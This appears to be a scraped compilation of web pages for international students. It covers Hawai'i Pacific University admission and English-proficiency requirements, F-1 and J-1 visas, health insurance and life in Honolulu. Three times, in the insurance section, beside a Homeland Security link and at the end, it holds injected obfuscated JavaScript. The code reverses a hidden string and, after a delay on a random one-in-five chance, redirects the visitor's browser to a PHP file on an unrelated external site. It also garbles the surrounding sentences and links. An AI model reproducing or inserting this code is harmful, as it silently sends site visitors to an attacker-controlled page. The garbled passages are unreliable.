Category: International Students (24)

Source: HPU

International students demonstrating that they meet the academic requirements of the university must also prove English proficiency before beginning an academic degree program.  Proficiency in English may be proved either by submitting a minimum score or better from one of the recognized English proficiency tests below or with a certificate of completion of level 112 of the ELS intensive program.

The English proficiency waivers, tests and minimum scores that HPU recognizes are:

Recognized Minimum Test Scores
High School Diploma Completed four years of high school study, in an international school or a school, where English is the primary medium of instruction. *
Paper-based TOEFL 550
Computer-based TOEFL 213, TWE 5.0
Internet-based Testing (iBT)TOEFL 80 or better including a writing score of 25 or more
International English Language Testing System (IELTS) 6 or above and 6.5 on the Writing Module
Scholastic Assessment Test (SAT) Critical Reading (CR) and Writing (WRI) add up to 800 or above
American College Testing Assessment (ACT) 18 or more in English
21 or more in Math
International Baccalaureate (IB) A grade of 4 or better in IB English A1 or A2, HL or S
GCSE (A-Level) or GSE (O-Level) A grade of “C” or better in English
College or University Studies 2 years of post-secondary study at an accredited college or university in the United States, Canada, or in a country where the primary language of instruction is English as determined by HPU’s “Country Exemptions” listed below.
Country Exemptions
Antigua Fiji St. Kitts & Nevis
Australia Grand Cayman Islands St. Lucia
Bahamas Grenada St. Vincent & Grenadines
Barbados Irish Republic South Africa
Belize Jamaica Trinidad & Tobago
Bermuda Malawi United Kingdom
Canada (not Quebec) New Zealand Virgin Islands
Dominica Singapore
Japan STEP EIKEN Test Pre-1*
India and Sri Lanka 60% or better in English on CIE or National Board (CBSE, ISC, State Board) exams, grade of 4 or better in IB English A1 or A2, HL or S, grade of “C” or better on the A-level (GCSE) or O-Level Exam (GSE). *
Pearson Test of English Academic (PTE Academic) Overall 58
Certificate of Proficiency in English (CPE) Grade of C or better
Certificate of Advanced English (CAE) Grade of A
English Language Proficiency Test (ELPT) 965
Advanced Placement International English Language test (APIEL) 3 or better



* Students may be required to take the HPU Writing Placement Test

Note: Students applying for short-term study programs at HPU are required to submit written proof of their English proficiency. Please check the application requirements of the program you are applying for.

Source: HPU

Admission Requirements and Application Process

HPU has a rolling admission process which means there are no set deadlines, and reviews applications throughout the year. In order to ensure adequate time for evaluation and correspondence, it is strongly recommended that applications be submitted early.
On this page you will find information about International Admission Requirements for:

  • Undergraduate Student
  • Transfer Student
  • Study Abroad Student
  • Exchange Student
  • Returning Student
  • Graduate Student

Undergraduate Admission Requirements

Below you will find detailed admission requirements for first-time freshmen, students who just finished high school.


Accepted Grade Point Average (GPA)

Undergraduate Admission Requirem  First-time freshmen are expected to have the American equivalent of 2.5 grade point average (GPA) on a 4.0 scale (approximately 65%) or above in their secondary (senior or high school) education.


Proof of English Proficiency

International students that meet the academic requirements of the University must prove their English proficiency before beginning an academic degree program.
Please click on the link to find out what English proficiency tests are recognized by HPU.

Important! If the applicant has not met the minimum language requirements for admissions, they will need to enroll in theELS Language Center program. Completion of level 112 will be necessary for full enrollment at HPU.


Attention AP and IB Students!

Students who have taken Advanced Placement Examinations (AP) of the College Board or the International Baccalaureate(IB) Program will be accepted with above average scores (AP grades higher than 3 and IB scores higher than 4) and should have the results forwarded to the Office of International Admissions. These results will be evaluated not only for admission, but also for proper advanced standing and/or credit from HPU. Students graduating with the Academic Transcripts.

Official transcripts or international equivalent records (such as HKCEE, SPM, SMA, Abitur, “O” and “A” levels, etc) may be submitted electronically or by mail.


You can complete an Undergraduate Application Form  or apply online by filling out our Online Undergraduate Application.

Application Fee

Please submit a $50.00 non-refundable application fee and for a complete list of accepted payment options you may click on the link.    

Financial Proof

Official copy of a bank statement showing that you (or your sponsor) have an account which holds sufficient funds to cover the total estimated costs may be submitted electronically or by mail.
You must also submit the Statement of Financial Sponsorship, which is part of the undergraduate application form. If you apply online, please fill out this form separately.

Additional Documents

International students who want to study in the USA are required to have health insurance coverage. Although not required for your admission, health insurance is mandatory and is required for all regular (Fall and Spring) semesters of your studies in the United States. Click on the link to find out more about $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);} Immunization” href=””>the health insurance and immunization requirements

Application Checklist

Please submit electronically to:
international@hpu.eduOr by mail to:
Hawai’i Pacific University
International Admissions
1164 Bishop Street, Suite 1100
Honolulu, Hawaii 96813 – U.S.A.


Undergraduate Scholarship Opportunity

Full-time degree-seeking and transfer are automatically evaluated for HPU’s merit based scholarships.

Transfer Student Admission Requirements

International transfer students are those who come to HPU from other regionally accredited colleges or universities. To be considered for admission to HPU, transfer students need to have at least 24 credits/semester hours of college level, academic coursework from an accredited institution.

Applicants who have attended any post-secondary institution (college, university, technical institute, etc.) will be evaluated based upon this work in combination with their performance in secondary school. Transfer students should submit their transcripts along with the application for admission. Based upon these transcripts, a decision will be made about acceptance and also about exemption from course work at HPU. Transfer students should also check with the institution they are attending or have attended to see if there is already an articulation agreement with HPU (formal transfer agreement) in place.

Academic Transcripts

To be able to evaluate your coursework or degree from your country, please submit your complete application which includes an official transcripts in your native language as well as an official translated English version. You may submit these documents electronically or by mail.

Course Descriptions

If you are transferring from a non-U.S. university or college, it is required that you provide an official description of each course in English. Credits will be awarded based on a formal evaluation.

Have Questions?

If you have any questions about your credit evaluation, please contact our international undergraduate evaluator Jeffrey Ho at The evaluator will need to see a copy of your transcripts and course descriptions in English.

Application Checklist

Please see Undergraduate Application Checklist


Study Abroad Admission Requirements

Study Abroad students are those who want to spend one or two semesters in an international environment. Study Abroad applicants must have at least a high school diploma or its equivalent or have started a college degree with an accepted grade point average (GPA).

Accepted Grade Point Average (GPA)

International applicants are expected to have the American equivalent of a 2.5 grade point average (GPA) on a 4.0 scale (approximately 65%) or above in their secondary (senior or high school) education.

Proof of English Proficiency

TOEFL or equivalent test is required for this program! Please click on the link to find out what English Proficiency Tests are recognized by HPU.

Note: If the applicant has not met the minimum language requirements for admissions, they will need to enroll in the ELSprogram. Once a student reaches level 110 or above, they may begin taking HPU courses concurrently. Completion of level 112 will be necessary for full enrollment at HPU.

Attention Students with Government Funding

If you receive government funding, and/or want to transfer HPU courses back to your home university, you should take an English proficiency test in your country and submit the results (original or certified) along with your Study Abroad application. Submission of acceptable test results exempts you from taking ELS courses and ensures that you will be able to pre-register and enroll in academic courses.


Please complete a Study Abroad Online Application.

Payment of Fees

Payment of your non-refundable $50 application fee and $200 pre-registration deposit is required to submit your online application.

Financial Proof

Please mail an original or certified copy of a bank statement showing that you (or your sponsor) have an account which holds sufficient funds to cover the total estimated costs. Please see our Statement of Financial Sponsorship Form for the total estimated costs.

Academic Transcripts

Official transcripts or international equivalent (such as HKCEE, SPM, SMA, Abitur, “O” and “A” level results, etc) may be submitted electronically or by mail.

Application Checklist

Please Remember!

Selection of classes should be made only from current class-offering lists which are posted for each academic term at least three months prior to its start.

The level of courses you can take at HPU depends on your educational background and your English proficiency. Courses for upcoming semesters are posted at least three months in advance of the beginning of each term. Typically, courses numbered 1000-2900 are open to high school graduates or first year college students. Courses numbered 3000-4990 are reserved for students who have completed at least their second year of college. Graduate courses (numbered 6000 and above) are open only to students who have completed a bachelor’s degree or its equivalent.

Exchange Student Admission Requirements

Please submit your application and the required documents to your school representative and check with your school for application deadlines. Although HPU has not set an application deadline, we recommend that you submit your application along with the required documents as early as possible to allow sufficient time for processing and to ensure that you will receive your visain time.

Application Checklist

  • Complete an Exchange Student Application (must be typed), and submit it to your Exchange Program coordinator.
  • Have your school forward your most current official transcript to HPU.
  • Submit test results from any English proficiency tests recognized by HPU.
  • Provide proof of medical insurance coverage
  • Submit an original or certified copy of a bank statement showing that you (or your sponsor) have an account which holds sufficient funds to cover the estimated costs for housing and living expenses.
  • Include a copy of your passport photo page.


Returning Student Admission Requirements

Students who have been enrolled at HPU, but have left the United States for 5 months or longer, must request a new I-20 before returning to school.

Applying for a new I-20

In order to receive a new I-20, you will need to resubmit a new Statement of Financial Support Form (Degree Seeking orStudy Abroad) and original financial/bank document, which verifies proof of financial support from you or your sponsor. Please refer to the following link for the latest tuition and I-20 total for the academic year: Please also note that the original bank document(s) should be no more than six months old.

Be sure to indicate your full legal name as shown on your passport, and include your permanent address in your country, a valid phone number where we can reach you and a note about your intended return date and semester. If you have any updated or new transcripts you may include them as well. Include a copy of your passport.

Please submit documents electronically to:

Or by mail to:
Hawai’i Pacific University
International Admissions
1164 Bishop Street, Suite 1100
Honolulu, Hawaii 96813 – U.S.A.

Honolulu, Hawaii: The ultimate happy place

Source: ABC NEWS

Why it won: Off-the-charts mental health scores.

Happiness hub: Any beach, anytime.

Few states are as racially diverse as Hawaii, and the melting-pot mentality may be a key reason the people of Honolulu are so happy here.

“There really is no majority group,” says Bill Haning, MD, a professor of psychiatry at the University of Hawaii. “That leads to a sense of belonging and of being respected that other cities may not enjoy.”

Of course, it’s healthy, too, with low BMIs and high cancer-survival rates. “Plus, we’ve had near-universal health care here since the 1970s, so most people get really good care,” Dr. Haning says.

The other reason residents here are so happy? It’s pretty close to heaven on earth, with rainbows, waterfalls, and balmy island breezes year-round.

“I literally pinch myself on my drive to work every day,” says Nancy Sidun, PsyD, president-elect of the Hawaii Psychological Association. Her fellow Honoluluans appear to feel the same. “People really cherish that beauty. Whether you walk on the beach at 5 am or 8 pm, there is always someone swimming. Five months out of the year, you can see whales spouting.”

Source: HPU

Cultural Destinations

First, let’s start with the cultural destinations.  There are lots of great destinations that frequent by tourists and locals alike.  To name a handful, places such as Pearl Harbor MemorialHanauma BayBishop MuseumKualoa Ranch, and Polynesian Cultural Centerare worth visiting time and again.  You can check out these places and more by visiting State of Hawaii Tourism web site.  If you are interested in exploring the top cultural destinations, there are many touring companies that offer pick up from Waikiki for free with ticket purchases, or a small transportation fee.


Getting around

Hawaii’s public transit, TheBus, is a great way to travel around town.  As a student you are/or will become familiar with the bus system.  The easiest way to know available bus routes to various locations is to go to the website,  TheBus offers great student rate to purchase a UPass for university students.  Learn more about TheBus and UPass.  You can always contact Commuter Services to obtain information on airport shuttles, on island transportation, apartment rental, and resources about off-campus living as students.  Outdoor and Social activities

Hawaii is known for its year round warm tropical weather.  Why not take advantage and join a club, learn a new sport, or compete in local tournaments?  The following recreation links are activities and groups on Oahu, these are great way to flex your physical and social muscles, or simply get active.

Bike– Besides commuting around town with your cruiser, did you know that Oahu has a growing bike community hidden in plain sight?  They race around the island for fun and for competition (think Tour de France).   Check out the Honolulu Bicycling League or call 808-735-5756 for details and group rides as a start!

Hike– There are too many trails on Oahu that it’s impossible to list them all.  You can also check out the Hawaiian Trail and Mountain Club or Sierra Club Hawaii for their weekly hiking events.  Before you head out, make sure to check out Hawaii State Parks to help you map out a hike route and get great safety tips. Remember, always hike with a partner!

Ultimate Frisbee– Hawaii Ultimate League hosts year-round competitions and great social events.  It’s a great way to work out and make new friends at the same time.

Camping– There are plenty of public and private camping grounds on Oahu.  First step is to acquire a permit at Hawaii State Parks or through the City and County of Honolulu.  You can choose from reserving a lot on the camp ground for tents, to renting a cabin with minimal amenities to fully equipped facilities for a small fee.  It’s a great way to get away from the city without traveling far.

YMCA/YWCA– Both the YMCA and the YWCA, have fitness centers close to the downtown campus.  YMCA also has fitness center near the Hawaii Loa Campus.  Being a member also has the benefit of utilizing their privately owned camp grounds on the North Shore and Windward locations.

Beaches– Living on Oahu means that you don’t necessarily have to fight for the few square feet of sand on the beach of Waikiki.  Check out these great spots all around the island.

Of course, you will want to visit the famous Vans Triple Crown Surfing  competitions on the North Shore during the winter season.  It is important to observe up to date ocean safety warnings and be aware of your surrounding at all times when you are visiting north shore beaches during EPIC waves.


Local Arts and Night Life

There’s always something happening around the island.  You will find variety of evening entertainments near Waikiki/Downtown area. To stay in the loop, pick up a free newsletter or check websites such as MidWeek  to know the happenings from live concerts, night clubs, to theatre plays.  Hawaii Public Radio station has a community calendar that connects you to local news and community art events near your neighborhood and across the Hawaiian Islands (in case you are planning to visit another island).

Oahu has a thriving ballroom dancing community that offers weekly dancing events and lessons of variety of dance moves from Waltz, to Salsa; the lessons range from free to a very reasonable fee.  Start by checking out Dance Hawaii, a non-profit organization, for events and classes to show off your moves, or learn to tango!


Family and Youth Activities

Family day events such as free music concerts, interactive workshops at the Waikiki Aquarium, arts at Children’s Discovery Center, cultural festivals and parades, and twilight tour of Waikiki Zoo are just a few activities that take place regularly.

Events are listed on Hawaii Public Radio Community Calendar.

YMCA and YWCA also offer regular youth programs during after school hours and school breaks; they also provide day care options.


Shop Local. Eat Local.

Farmer’s markets have become very popular places for locals and visitors alike to shop for locally grown produces and Hawaii-made items.   To name a few near Downtown campus:  every Tues. & Fridays, Fort Street Market opens from 8am to 2pm in the court yard between Macy’s and Ross.  On Wed. afternoon, hop on a bus from Fort Street Mall and head to Honolulu Farmer’s Market in Neal S. Blaisdell Center on Ward Ave & Kapiolani Blvd., the market is open from 4pm to 7pm.  Near Windward Campus: Head down to Kailua for The Kailua Thurs. Night Farmer’s Market, from 5pm to 7:30pm, in the Parking Garage behind Long’s, near Macy’s shopping center.  Everyday there is at least one farmer’s market somewhere on the island; check out the following web page, to find farmer markers around your neighborhood:

Finally, Honolulu Magazine generates BEST PICKS annually.  Check out the most recent BEST restaurants and entertainment venues and decide for yourself!


Prior to leaving your country, we would like to provide you with some valuable information to ensure a smooth transition to your studies at HAWAII. Please carefully read through the information given, so that you won’t run into any major problems once you arrive.


1. Apply for Your Student Visa

You will need to provide verification of the SEVIS fee payment at least three business days prior to your scheduled visa interview at the U.S. embassy or consulate. For more information on how to apply for your student visa please click here.


2.  Pay Tuition-Deposit 

Please pay mandatory college tuition deposit, which will be applied towards your tuition. Please email us if you have any question. Each university is different. Click here to contact us.


3. Book Your Flight

Please keep in mind that visa regulations allow you to enter the USA up to 30 days before the first day of classes (the reporting date is shown on your I-20). Important! Please make sure to make your travel arranagements to arrive to Honolulu no later than the date in your I-20.


4. Arrange Airport Pickup

At H.I.S., we can pick you up at the airport! You could take a taxi or something, but is much better to arrive when someone is waiting for you. We will take you to some famous spots in the island so you start your adventure right away! Please fill up the form requesting a pick up.


5. Arrange Housing

Honolulu is one of the most desirable cities to live in and one of the top tourist destinations in the world. Because of this, the housing market is very tight both on and off campus. We encourage you to secure housing as soon as possible. Click here to get a list of student housing options.


6. Medical Insurance and Health Requirements

In order to study in Hawaii, you must have health insurance and submit certain health records. Please click here to read this section carefully to get the information you will need.


7. New Student Orientation

All the Universities have Orientation for New Students. This is a great opportunity for all new students to meet and interact with other students, faculty, and staff. Click here if you want us to help you to find out more information about the orientation time and location for your university.


8. Learn about Hawai`i

Come prepared- learn more about living in Hawaii – here you will find even more information about shopping in Hawaii, as well as popular cultural destinations, social and outdoor activities.



Source: HPU

Health Insurance and Immunization Information

Some universities sell their own insurance plans. If you need help to get more information about the insurance options, please contact us.

Your medical insurance must meet the following requirements:

  • Valid coverage dates for the entire semester(s) attended need to be stated on the policy;
  • Coverage for outpatient care, hospitalization, emergency room, accidents, medical evacuation, repatriation, and surgery needs to be provided;
  • Health plans must have a non-reimbursement policy. This means that all medical bills must be paid DIRECTLY by the insurance company to the medical provider;
  • Minimum $100,000 US Dollar coverage;
  • Medical benefits of at least $50,000 per accident or illness;
  • A deductible not to exceed $500 per accident or illness;
  • At least 75% coverage for each accident or illness;
  • Repatriation of remains in the amount of $7,500;
  • Expenses associated with the medical evacuation of the exchange visitor to his or her country in the amount of $10,000.

Plans that are NOT accepted include:

  • Life insurance policies;
  • Travel insurance plans;
  • Accident or hospitalization only plans;
  • Plans that reimburse the student rather than the medical provider. 

Additional Medical Requirements

Students are required to submit written proof of the following medical information:

1. Tuberculosis (TB)

International Students are required to take a TB test after their arrival in Hawaii. TB certification issued outside of the U.S. cannot be accepted by the Universities. We can provide arriving students with information on how and where to get tested at no charge.

2. Measles (Rubeola) or MMR Clearance

Students must have received two doses of measles or MMR shots in their own country (written proof – such as an official vaccination record – is required). Alternatively, students may receive their measles shots upon arrival at HPU.

Source: HPU Site

International students studying in the U.S. (even if you only study for a short time) are required to obtain a student visa. Below you will find information that will help you understand the visa process and how to apply for a visa.

F-1 Visa

The F-1 visa is a non-immigrant, full-time, student visa that allows you to pursue education in the United States.

When the university admits a student, it sends the student a  Certificate of Eligibility for Nonimmigrant (F-1) Student called the I-20. This form  provides information that includes your field of study (major), the length of your  study, and the date  you must report to the university. The form I-20 allows a student to apply for an F-1 student visa.

How do I obtain an F-1 student visa?

  1. Receive the I-20 form from Hawai’i Pacific University.
  2. Schedule your visa appointment with the U.S. Embassy/Consulate in your country.
  3. Submit SEVIS fee payment in time to allow Department of Homeland Security to process payment at least 3 days prior to visa interview.
  4. If you paid online, please print SEVIS fee payment receipt and  take it to your visa interview.
  5. Go to your visa interview to request an F-1 visa (the visa may not be issued right away; many embassies mail the visa to the student a few weeks after the interview).
  6. Pay visa fees (subject to change)Please note that the I-20 does not guarantee receipt of an F-1 visa. The local Consular official makes the final decision on whether or not to issue a student visa.Attention: Canadian Students!
    Entering the US from Canada, students are not required to apply at a U.S. embassy for a student visa, however, they are required to pay the SEVIS fee. Please  click here for information about SEVIS fees.
    Students must present their I-20 and passport to  U.S. immigration officer at the point of entry for the F-1 student  status stamp.

J-1 Visa

A J-1 visa is a non-immigrant visa issued by the United States to exchange visitors who participate in programs that promote cultural exchange. Applicants must meet eligibility criteria and be sponsored either by a private sector or government program.

The university issues the DS-2019  for the J-1 Exchange Visitor Status, to apply for the J-1 student visa.

How do I obtain a J-1 student visa?

  1. Receive the DS-2019 form from Hawai’i Pacific University.
  2. Schedule your visa appointment with the U.S. Embassy/Consulate in your country.
  3. Submit SEVIS fee payment in time to allow Department of Homeland Security to process payment at least 3 days prior to visa interview.
    Students from Canada, please click here for information about SEVIS fees.
  4. If you paid online, please print SEVIS fee payment receipt and bring it to your visa interview.
  5. Go to your visa interview to request a J-1 visa (the visa may not be issued right away; many embassies mail the visa to the student a few weeks after the interview).
  6. Pay visa fees (subject to change)

Useful Information


More information on student visa.

When can I enter the U.S.A.?

 Visa regulations allow you to enter the United States up to 30 days before the first day of classes (the reporting date shown on your I-20). If you attempt to enter the U.S. earlier, you will be denied entry at the  immigration port of entry in to U.S., in most cases the airport.   Please plan your flight itinerary with this important policy in mind.

What happens if I cannot arrive by the reporting date?

You must request a new I-20 from your university. Many universities will admit you for the next available session, but some universities may have restrictions on readmission.

What will happen when I enter the U.S.A.?

An airline flight attendant will ask you to complete the I-94 (Arrival/Departure Record) in the airplane before you land at the U.S. port of entry, (if you arrive by land from Canada or Mexico, you need to request the I-94 at border crossing.) You will present the I-94 form and your passport to the immigration inspector when you land. The immigration inspector will stamp the I-94 form with “D/S (duration of status). “D/S” means that you may stay in the U.S.A. until your I-20 expires, if you maintain full-time enrollment. You should keep the I-94 form and a copy of your valid I-20 or DS-2019 with your passport at all times.

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}_Security_Info_Sheet_a9827.pdf”>Click here to download an important information sheet issued by the U.S. Department of Homeland Security on what a student or exchange visitor can expect upon arrival:

What are my obligations as a student on an F-1 visa?

Students on an F-1 visa must follow the regulations of the U.S. Department of Homeland Security. According to these regulations, you must:

What are my obligations as a student on a J-1 visa?

Students on a J-1 visa must follow the regulations of the U.S. Department of Homeland Security. According to these regulations, you must:

How long can I stay in the United States?

The I-20 indicates the length of time you can stay to finish your course of studies. You may stay 60 days after the last day of class.
(J-1 DS 2019 may stay 30 days).

If I cannot complete my studies in the required time, may I stay longer?

If you need a longer time to complete your studies, International Student Advisor at the International Center will help you apply for an extension. If you have completed your studies, you are not allowed to continue to stay in the U.S. with that I-20, even if it has not expired.

If my visa expires, how do I renew it?

The visa is an entry document only. The visa needs to be valid only at the time you enter the U.S. It does not need to be renewed if you stay in the U.S. However, you may wish to visit Canada, Mexico, or your home country during vacation periods. If your visa has expired, ask your International Student Advisor to provide complete information about how to renew your visa. You may then apply for a new visa at a U.S. Embassy or Consulate in the country you are visiting.


) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}“]